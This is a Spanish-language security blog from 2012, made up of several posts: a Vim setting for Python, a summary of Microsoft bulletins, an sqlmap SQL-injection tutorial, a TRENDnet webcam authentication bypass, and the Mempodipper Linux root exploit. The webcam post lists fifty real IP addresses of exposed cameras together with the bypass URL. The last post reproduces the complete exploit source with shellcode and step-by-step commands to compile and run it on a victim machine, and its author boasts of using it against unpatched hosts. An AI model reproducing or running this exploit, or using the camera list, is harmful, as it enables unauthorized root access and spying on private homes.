domingo, 19 de febrero de 2012

Configuracion de VIM para mantener los niveles de identacion para PYTHON

hoy hablando con un brother me preguntaba en que entorno en linux se puede programar de manera eficiente Python, la verdad que mi poca experiencia en desarrollos grandes de hacia inclinarme por eclipse y el modulo Pydev, sin embargo en foros y comunidades es muy utilizado en editor de archivos VIM, el cual yo también uso sin embargo existen configuraciones avanzadas las cuales hacen de vim uno de los editores favoritos al momento de programar en Python ya que estos mismos programadores han creado módulos y realizados hack al editor y bueno han optimizado para el desarrollo en python:
Así que poco a poco iré actualizando esta entrada con todas las técnicas utilizadas para optimizar vim.
1. Configurar la tecla tab para mantener el nivel de identacion a 4 espacios en blanco.blanco
entramos a nano /etc/vim/vimrc
y modificamos
if has("syntax")
  syntax on
  set tabstop=4
  set shiftwidth=4
  set smarttab
  set expandtab                                                                 
  set softtabstop=4
endif

gracias

martes, 14 de febrero de 2012

Boletines de Seguridad Microsoft

Desde Hispasec Sistemas les hago y C & P de los Boletines de Seguridad para febrero de Microsof que parcha 21 vulnerabilidades. de la cuales consideran 4 como "criticas" y 5 como importantes.


* MS12-008: Boletín de carácter "crítico" destinado a corregir dos
vulnerabilidades en los controladores en modo kernel de Windows que
podrían permitir la ejecución remota de código arbitrario (CVE-2011-5046
y CVE-2012-0154). Afecta a Windows XP, Server 2003, Vista, Server 2008 y
Windows 7.

* MS12-009: Actualización para corregir dos vulnerabilidades (con
CVE-2012-0148 y CVE-2012-0149) en el controlador de función auxiliar que
podrían permitir la elevación de privilegios si un usuario ejecuta un
archivo malicioso. El boletín presenta un nivel de gravedad
"importante", y la vulnerabilidad que resuelve afecta a Windows XP,
Windows 7 y Server 2003 y 2008.

* MS12-010: Actualización acumulativa para Microsoft Internet Explorer
que además soluciona cuatro nuevas vulnerabilidades que podrían permitir
la ejecución remota de código arbitrario. Afecta a Internet Explorer 6,
7, 8 y 9. Los CVE asociados a las vulnerabilidades son CVE-2012-0010,
CVE-2012-0011, CVE-2012-0012, y CVE-2012-0155.

* MS12-011: Actualización para solucionar tres vulnerabilidades en
Microsoft SharePoint y Microsoft SharePoint Foundation. Los problemas
podrían permitir la elevación de privilegios o la divulgación de
información sensible (CVE-2012-0017, CVE-2012-0144 y CVE-2012-0145).
Este boletín está valorado como "importante".

* MS12-012: Boletín "importante" que resuelve una vulnerabilidad en en
el panel de control que podría permitir la ejecución remota de código
arbitrario si un usuario abre un archivo (como .icm o .icc)
especialmente creado (CVE-2010-5082). Afecta a Windows Server 2008.

* MS12-013: Boletín de carácter "crítico" destinado a corregir una
vulnerabilidad de ejecución remota de código en la biblioteca de tiempo
de ejecución C, si un usuario abre un archivo multimedia específicamente
creado (CVE-2012-0150). Afecta a Windows Vista, Windows 7 y Server 2008.

* MS12-014: Actualización para corregir una vulnerabilidad en la forma
en que el códec Indeo trata la carga de archivos DLL, que podría
permitir la ejecución remota de código arbitrario (CVE-2010-3138). El
boletín presenta un nivel de gravedad "importante" y afecta a todos los
sistemas Windows.

* MS12-015: Boletín "importante" que resuelve cinco vulnerabilidades en
Microsoft Office, que podría permitir la ejecución remota de código si
un usuario abre un archivo de Visio especialmente creado. Afecta a
Microsoft Visio Viewer 2010. Los CVE asociados a las vulnerabilidades
son CVE-2012-0019, CVE-2012-0020, CVE-2012-0136, CVE-2012-0137 y
CVE-2012-0138.

* MS12-016: Este boletín está valorado como "crítico", consiste en una
actualización para solucionar dos vulnerabilidades en Microsoft .NET
Framework y Microsoft Silverlight que podrían permitir la ejecución
remota de código si un usuario visita una página web especialmente
diseñada mediante un explorador web que pueda ejecutar aplicaciones XAML
del explorador (XBAP) o aplicaciones Silverlight. (CVE-2012-0014 y
CVE-2012-0015).

Las actualizaciones publicadas pueden descargarse a través de Windows
Update o consultando los boletines de Microsoft donde se incluyen las
direcciones de descarga directa de cada parche. Se recomienda la
actualización de los sistemas con la mayor brevedad posible.

Opina sobre esta noticia:
http://unaaldia.hispasec.com/2012/02/boletines-de-seguridad-de-microsoft-en.html#comments

Más información:

Resumen del boletín de seguridad de Microsoft de febrero 2012
http://technet.microsoft.com/es-es/security/bulletin/ms12-feb

Boletín de seguridad de Microsoft MS12-008 - Crítica
Vulnerabilidades en los controladores en modo kernel de Windows podrían permitir la ejecución remota de código (2660465)
http://technet.microsoft.com/es-es/security/bulletin/MS12-008

Boletín de seguridad de Microsoft MS12-009 - Importante
Vulnerabilidades en el controlador de función auxiliar podrían permitir la elevación de privilegios (2645640)
http://technet.microsoft.com/es-es/security/bulletin/ms12-009

Boletín de seguridad de Microsoft MS12-010 - Crítica
Actualización de seguridad acumulativa para Internet Explorer (2647516)
http://technet.microsoft.com/es-es/security/bulletin/ms12-010

Boletín de seguridad de Microsoft MS12-011 - Importante
Vulnerabilidades en Microsoft SharePoint podrían permitir la elevación de privilegios (2663841)
http://technet.microsoft.com/es-es/security/bulletin/ms12-011

Boletín de seguridad de Microsoft MS12-012 - Importante
Una vulnerabilidad en Panel de control de color podría permitir la ejecución remota de código (2643719)
http://technet.microsoft.com/es-es/security/bulletin/ms12-012

Boletín de seguridad de Microsoft MS12-013 - Crítica
Una vulnerabilidad en la biblioteca de tiempo de ejecución C podría permitir la ejecución remota de código (2654428)
http://technet.microsoft.com/es-es/security/bulletin/ms12-013

Boletín de seguridad de Microsoft MS12-014 - Importante
Una vulnerabilidad en el códec Indeo podría permitir la ejecución remota de código (2661637)
http://technet.microsoft.com/es-es/security/bulletin/ms12-014

Boletín de seguridad de Microsoft MS12-015 - Importante
Vulnerabilidades en Microsoft Visio Viewer 2010 podrían permitir la ejecución remota de código (2663510)
http://technet.microsoft.com/es-es/security/bulletin/ms12-015

Boletín de seguridad de Microsoft MS12-016 - Crítica
Vulnerabilidades en .NET Framework y Microsoft Silverlight podrían permitir la ejecución remota de código (2651026)
http://technet.microsoft.com/es-es/security/bulletin/ms12-016

viernes, 10 de febrero de 2012

Volcando datos al explotar un SQLi - Parte III - Automatiza el ataque

En Inyecciones SQL de tipo Inbound donde tenemos un procedimiento de listado la cual nos permite volcar en pantalla la información extraída es preferible realizar la explotación manual ya que realmente usar alguna tool puede ser demasiado ruidosa y podríamos levantar algunas alertas sin embargo existen excelentes herramientas como SQLmap nos permiten realizar esta tarea de manera optima ya podemos manipularla para que realice exactamente lo que se requiere, a si que para nuestro ejemplo podríamos manejarlo así:

Nota: en este ejemplo estoy asumiendo que el lector conoce poco o nada de explotación con sqlmap así que para algunos puede ser algo lento bueno como siempre el fin es compartir con los que recién inician.

Para ejecutar Sqlmap en backtrack 5 podemos entrar al directorio /pentest/database/sqlmap para ejecutarla basta con llamar a la aplicación sqlmap.py con el interprete de Python ejemplo:

python sqlmap.py -h

con el -h nos muestra un help de sqlmap, ahora en nuestro caso para llamar a la web utilizamos el parámetro --url o simplemente -u como pasamos los parámetros por GET simplemente se especifica en la url:

python sqlmap.py --url="http://localhost/sqli.php?fileid=1"


como siempre lo digo las tools solo son un complento así que no inicien un Testeo directamente con una tool ya que para optimizar requerimos información precisa a si el proceso de Testing es mas limpio, levantamos menos sospechas y podemos cumplir nuestro objetivo entonces siempre en alguna explotación de sqli primero identificamos las siguientes parámetros:

1. La variable vulnerable
2.El payload
3. Motor de Base de datos
4. El tipo de explotación
5. Alcance de la explotación


En nuestro caso estos datos obtuvimos o suponemos que son:

1. variable GET fileid
2. payload and 1 =1
3. motor de DB mysql
4. El tipo es InBound
5. Extracción de información del information_schema


ahora como armamos nuestro escenario:
la variable vulnerable se poner con el parámetro -p
python sqlmap.py --url="http://localhost/sqli.php?fileid=1" -p "fileid"
siempre es recomendable modificar los payloads, pero para este tutorial usaremos los que vienen por defauld, para indicar el motor de DB se hace uso del parámetro --dbms

python sqlmap.py --url="http://localhost/sqli.php?fileid=1" -p "fileid" --dbms="mysql"

Para el tipo de explotación se usa el parámetro --technique
en sqlmap a la explotación tipo inbound se conoce como UNION así que la cosa quedaría:

python sqlmap.py --url="http://localhost/sqli.php?fileid=1" -p "fileid" --dbms="mysql" --technique="U"


Con eso parámetros podríamos darle al sqlmap de forma masticada la vulnerabilidad para que este lo almacene en su base de conocimientos.
En una explotación inbound o union como pudimos ver para poder volcar los datos necesitamos de mamera exacta cuando valores son llamados en la consulta en los tutoriales anteriores esto lo logramos con ORDER BY aquí en sqlmap se usa el parametro --union-cols="x-n" donde x el valor mínimo y n el máximo tal y como lo vimos con order by en caso ya identifiquemos en numero de valores para nuestro caso 3 lo podemos hacer asi
python sqlmap.py --url="http://localhost/sqli.php?fileid=1" -p "fileid" --dbms="mysql" --technique="U" --union-cols="3-3" -v 3
qui indicamos que son 3 valores que es llamado en la consulta y el -v indica el nivel de información de salida, con el comando anterior el sqlmap ya esta listo para identificar la vulnerabilidad para luego explotar.
si sqlmap encuentra que la variable fileid es vulnerable nos lanza esta alerta


luego guarda en output un archivo con datos de la vulnerabilidad para luego explotarla, ahora solo no falta volcar la información para nuestro caso seria los siguientes comandos:
python sqlmap.py --url="http://localhost/sqli.php?fileid=5" -p "fileid" --current-db

miércoles, 8 de febrero de 2012

Si tienes en tu cuarto una Camara TRENDnet mejor Apagala

Un fallo de seguridad muy pero muy vergonzosa en algunos modelos de las cámaras TRENDnet el cual permite a un atacante o algún curioso conectarse a una de estas Webcams remotamente bypasseando la autenticacion e ingresando sin introducir ningún usuario ni contraseña valida.
la verdad que estos fallos son demasiado fáciles de explotar y quisas no merece la pena dedicarle mucho tiempo a la explicación, si tenemos una de estas webcam corriendo sobre la ip 192.168.1.2 apuntada al puerto 80 solo debemos de agregar "/anony/mjpg.cgi"
http://192.168.1.2/anony/mjpg.cgi
y listo nos saltamos el login y podemos ver nuestra webcam, ahora en caso no tengamos una pero queremos buscar algunas por la red la podemos hacer desde el poderoso SHODAN un método de búsqueda seria
http://www.shodanhq.com/search?q=TRENDnet

Y como en el mundo hay cada genio (Vago) ya hay en pastebin un lista de mas de 1300 url de estas webcam las cuales son vulnerables: http://pastebin.com/jLqbjpJh

, la lista sigue creciendo y puedes dar también tus aportes qui les dejo un pantallaso de una webcam:
ojo muchas de estas ip presentadas en la lista de url ya no se encuentran activas debido a que estas ips pueden ser dinámicas y pudieron haber cambiado, como contramedida en caso tengas esta webcam con este bug se recomienda actualizar el firmware de tu Webcam y como sabrán es una buena practica tapar la webcam casi nadie que conoce algo de seguridad la trae sin cubrir. Aqui les dejo 50 IP de la lista de PASTEBIN
http://94.18.124.194/anony/mjpg.cgi
http://80.15.131.186/anony/mjpg.cgi
http://78.156.127.21/anony/mjpg.cgi
http://71.63.36.13/anony/mjpg.cgi
http://190.96.212.150/anony/mjpg.cgi
http://189.234.129.103/anony/mjpg.cgi
http://99.139.70.3/anony/mjpg.cgi
http://65.182.79.56/anony/mjpg.cgi
http://78.233.76.131/anony/mjpg.cgi
http://93.100.234.102/anony/mjpg.cgi
http://91.64.157.16/anony/mjpg.cgi
http://99.189.24.236/anony/mjpg.cgi
http://98.194.41.34/anony/mjpg.cgi
http://67.148.242.39/anony/mjpg.cgi
http://173.197.24.110/anony/mjpg.cgi
http://82.241.221.67/anony/mjpg.cgi
http://81.20.161.234/anony/mjpg.cgi
http://96.252.11.123/anony/mjpg.cgi
http://88.163.52.198/anony/mjpg.cgi
http://76.30.239.192/anony/mjpg.cgi
http://63.229.31.1/anony/mjpg.cgi
http://67.152.141.125/anony/mjpg.cgi
http://65.167.91.229/anony/mjpg.cgi
http://24.49.134.172/anony/mjpg.cgi
http://98.196.16.153/anony/mjpg.cgi
http://152.14.56.212/anony/mjpg.cgi
http://85.170.41.122/anony/mjpg.cgi
http://108.38.11.47/anony/mjpg.cgi
http://201.241.57.183/anony/mjpg.cgi
http://67.33.52.88/anony/mjpg.cgi
http://188.26.196.60/anony/mjpg.cgi
http://72.130.154.165/anony/mjpg.cgi
http://148.244.71.207/anony/mjpg.cgi
http://77.73.53.238/anony/mjpg.cgi
http://38.107.185.237/anony/mjpg.cgi
http://74.71.239.153/anony/mjpg.cgi
http://173.72.150.62/anony/mjpg.cgi
http://81.248.22.160/anony/mjpg.cgi
http://119.234.201.114/anony/mjpg.cgi
http://220.134.93.194/anony/mjpg.cgi
http://76.103.91.127/anony/mjpg.cgi
http://71.238.95.169/anony/mjpg.cgi
http://81.20.148.158/anony/mjpg.cgi
http://89.156.201.187/anony/mjpg.cgi
http://187.153.231.142/anony/mjpg.cgi
http://200.114.12.155/anony/mjpg.cgi
http://173.73.40.122/anony/mjpg.cgi
http://216.58.57.60/anony/mjpg.cgi
http://76.252.236.95/anony/mjpg.cgi
http://96.4.3.59/anony/mjpg.cgi
By neotrons

Execution Mempodipper - Linux Local Root

Aqui les dejo el código del exploit jaja la verdad no tenia nada que publicar y opte por publicar como ejecutar Mempodipper y elevar privilegio la verdad que no es nada mas que copiar el código compilarlo y luego ejecutarlo pero bueno es una entrada y hay algunos que recién inician y les puede servir, por mi parte me estoy divirtiendo mucho ya que muchos aun no parchan y bueno también e creado una aplicación en python donde oculto Mempodipper y luego lo ejecuto y obtengo una shell reversa ya en otra entrada compartiré el código si que manos ala obra aquí les dejo el código para un C & P les recomiendo para mas información entrar a la pagina del zx2c4 el Autor del exploit donde lo explica de una manera increíble también el código desde la fuente oficial

/*
 * Mempodipper
 * by zx2c4
 * 
 * Linux Local Root Exploit
 * 
 * Rather than put my write up here, per usual, this time I've put it
 * in a rather lengthy blog post: http://blog.zx2c4.com/749
 * 
 * Enjoy.
 * 
 * - zx2c4
 * Jan 21, 2012
 * 
 * CVE-2012-0056
 */

#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

char *prog_name;

int send_fd(int sock, int fd)
{
 char buf[1];
 struct iovec iov;
 struct msghdr msg;
 struct cmsghdr *cmsg;
 int n;
 char cms[CMSG_SPACE(sizeof(int))];

 buf[0] = 0;
 iov.iov_base = buf;
 iov.iov_len = 1;

 memset(&msg, 0, sizeof msg);
 msg.msg_iov = &iov;
 msg.msg_iovlen = 1;
 msg.msg_control = (caddr_t)cms;
 msg.msg_controllen = CMSG_LEN(sizeof(int));

 cmsg = CMSG_FIRSTHDR(&msg);
 cmsg->cmsg_len = CMSG_LEN(sizeof(int));
 cmsg->cmsg_level = SOL_SOCKET;
 cmsg->cmsg_type = SCM_RIGHTS;
 memmove(CMSG_DATA(cmsg), &fd, sizeof(int));

 if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
  return -1;
 close(sock);
 return 0;
}

int recv_fd(int sock)
{
 int n;
 int fd;
 char buf[1];
 struct iovec iov;
 struct msghdr msg;
 struct cmsghdr *cmsg;
 char cms[CMSG_SPACE(sizeof(int))];
 
 iov.iov_base = buf;
 iov.iov_len = 1;

 memset(&msg, 0, sizeof msg);
 msg.msg_name = 0;
 msg.msg_namelen = 0;
 msg.msg_iov = &iov;
 msg.msg_iovlen = 1;

 msg.msg_control = (caddr_t)cms;
 msg.msg_controllen = sizeof cms;

 if ((n = recvmsg(sock, &msg, 0)) < 0)
  return -1;
 if (n == 0)
  return -1;
 cmsg = CMSG_FIRSTHDR(&msg);
 memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
 close(sock);
 return fd;
}

unsigned long ptrace_address()
{
 int fd[2];
 printf("[+] Creating ptrace pipe.\n");
 pipe(fd);
 fcntl(fd[0], F_SETFL, O_NONBLOCK);

 printf("[+] Forking ptrace child.\n");
 int child = fork();
 if (child) {
  close(fd[1]);
  char buf;
  printf("[+] Waiting for ptraced child to give output on syscalls.\n");
  for (;;) {
   wait(NULL);
   if (read(fd[0], &buf, 1) > 0)
    break;
   ptrace(PTRACE_SYSCALL, child, NULL, NULL);
  }
  
  printf("[+] Error message written. Single stepping to find address.\n");
  struct user_regs_struct regs;
  for (;;) {
   ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
   wait(NULL);
   ptrace(PTRACE_GETREGS, child, NULL, ®s);
#if defined(__i386__)
#define instruction_pointer regs.eip
#define upper_bound 0xb0000000
#elif defined(__x86_64__)
#define instruction_pointer regs.rip
#define upper_bound 0x700000000000
#else
#error "That platform is not supported."
#endif
   if (instruction_pointer < upper_bound) {
    unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
    if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
     return instruction_pointer;
   }
  }
 } else {
  printf("[+] Ptrace_traceme'ing process.\n");
  if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) {
   perror("[-] ptrace");
   return 0;
  }
  close(fd[0]);
  dup2(fd[1], 2);
  execl("/bin/su", "su", "not-a-valid-user", NULL);
 }
 return 0;
}

unsigned long objdump_address()
{
 FILE *command = popen("objdump -d /bin/su|grep ''|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
 if (!command) {
  perror("[-] popen");
  return 0;
 }
 char result[32];
 fgets(result, 32, command);
 pclose(command);
 return strtoul(result, NULL, 16);
}

unsigned long find_address()
{
 printf("[+] Ptracing su to find next instruction without reading binary.\n");
 unsigned long address = ptrace_address();
 if (!address) {
  printf("[-] Ptrace failed.\n");
  printf("[+] Reading su binary with objdump to find exit@plt.\n");
  address = objdump_address();
  if (address == ULONG_MAX || !address) {
   printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
   printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name);
   exit(-1);
  }
 }
 printf("[+] Resolved call address to 0x%lx.\n", address);
 return address;
}

int su_padding()
{
 printf("[+] Calculating su padding.\n");
 FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r");
 if (!command) {
  perror("[-] popen");
  exit(1);
 }
 char result[256];
 fgets(result, 256, command);
 pclose(command);
 return strstr(result, "this-user-does-not-exist") - result;
}

int child(int sock)
{
 char parent_mem[256];
 sprintf(parent_mem, "/proc/%d/mem", getppid());
 printf("[+] Opening parent mem %s in child.\n", parent_mem);
 int fd = open(parent_mem, O_RDWR);
 if (fd < 0) {
  perror("[-] open");
  return 1;
 }
 printf("[+] Sending fd %d to parent.\n", fd);
 send_fd(sock, fd);
 return 0;
}

int parent(unsigned long address)
{
 int sockets[2];
 printf("[+] Opening socketpair.\n");
 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
  perror("[-] socketpair");
  return 1;
 }
 if (fork()) {
  printf("[+] Waiting for transferred fd in parent.\n");
  int fd = recv_fd(sockets[1]);
  printf("[+] Received fd at %d.\n", fd);
  if (fd < 0) {
   perror("[-] recv_fd");
   return 1;
  }
  printf("[+] Assigning fd %d to stderr.\n", fd);
  dup2(2, 15);
  dup2(fd, 2);

  unsigned long offset = address - su_padding();
  printf("[+] Seeking to offset 0x%lx.\n", offset);
  lseek64(fd, offset, SEEK_SET);
  
#if defined(__i386__)
  // See shellcode-32.s in this package for the source.
  char shellcode[] =
   "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
   "\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
   "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
   "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
   "\x80";
#elif defined(__x86_64__)
  // See shellcode-64.s in this package for the source.
  char shellcode[] =
   "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
   "\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
   "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
   "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
   "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
  printf("[+] Executing su with shellcode.\n");
  execl("/bin/su", "su", shellcode, NULL);
 } else {
  char sock[32];
  sprintf(sock, "%d", sockets[0]);
  printf("[+] Executing child from child fork.\n");
  execl("/proc/self/exe", prog_name, "-c", sock, NULL);
 }
 return 0;
}

int main(int argc, char **argv)
{
 prog_name = argv[0];
 
 if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c')
  return child(atoi(argv[2]));
 
 printf("===============================\n");
 printf("=          Mempodipper        =\n");
 printf("=           by zx2c4          =\n");
 printf("=         Jan 21, 2012        =\n");
 printf("===============================\n\n");
 
 if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
  return parent(strtoul(argv[2], NULL, 16));
 else
  return parent(find_address());
 
}

Ahora para ejecutar el exploit solo tenemos que en nuestra maquina victima realizar la siguiente secuencia de comandos:
uname -a
touch mempodipper.c
vim mempodipper.c
con el primer comando verificamos la versión del Kernel si este es >= 2.6.39 es vulnerable, con el segundo comando creamos el archivo mempodipper.c con el tercero lo abrimos y procedemos a pegar el código del exploit.
gcc mempodipper.c -o mempodipper
chmod +x mempodipper
./mempodipper
con el primer comando compilamos el explit luego le damos permisos de ejecución y posterior lo ejecutamos y obtenemos una shell con privilegios de Root jajja muy fácil no.
Aquí les dejo un vídeo ya saben una imagen vale mas que mil palabras.